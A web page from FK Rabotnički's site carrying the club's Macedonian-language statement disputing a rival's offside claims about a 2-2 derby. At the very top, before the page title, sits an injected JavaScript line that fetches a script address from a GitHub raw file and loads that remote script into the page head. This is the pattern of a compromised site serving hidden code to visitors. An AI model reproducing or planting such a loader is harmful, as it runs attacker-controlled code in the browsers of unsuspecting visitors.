;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Реакција: Работнички не сака да биде дел од „ВАР на ѓорчепетровски начин“
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Реакција: Работнички не сака да биде дел од „ВАР на ѓорчепетровски начин“

ФК Работнички ги отфрла наводите на ФК Македонија Ѓорче Петров дека двата гола кои нашиот тим ги постигна на неделното градско дерби (2-2) на Националната арена „Тодор Проески“ се од наводна офсајд позиција. Не сакаме да бидеме дел од „ВАР на ѓорчепетровски начин“, според кој се даваат произволни и субјективни оценки за делењето правда, а особено доколку на тој начин се дискредитира реалниот квалитет на ФК Работнички.

Македонија Ѓорче Петров во никој случај не е компетентна, ниту пак има адекватна позиција согласно прикажаниот видео-материјал да даде проценка дали постигнатите голови на ФК Работнички се од наводна офсајд позиција. Доколку малку подобро ја реализирале арбитражата на натпреварот ѓорчепетровци ќе можат да најдат неколку ситуации каде се најдоа во сериозно повластена ситуација.

Ги повикуваме клубовите што сакаат да прават притисок на Судиската организација и да си „нарачаат“ добро судење за наредните неколку кола до крајот на првенството во Првата лига, тоа да не го прават на грбот на ФК Работнички. Нашиот клуб секогаш се залага за правда на теренот и вон него и правично судење на фудбалските натпревари.

Со почит,
ФК Работнички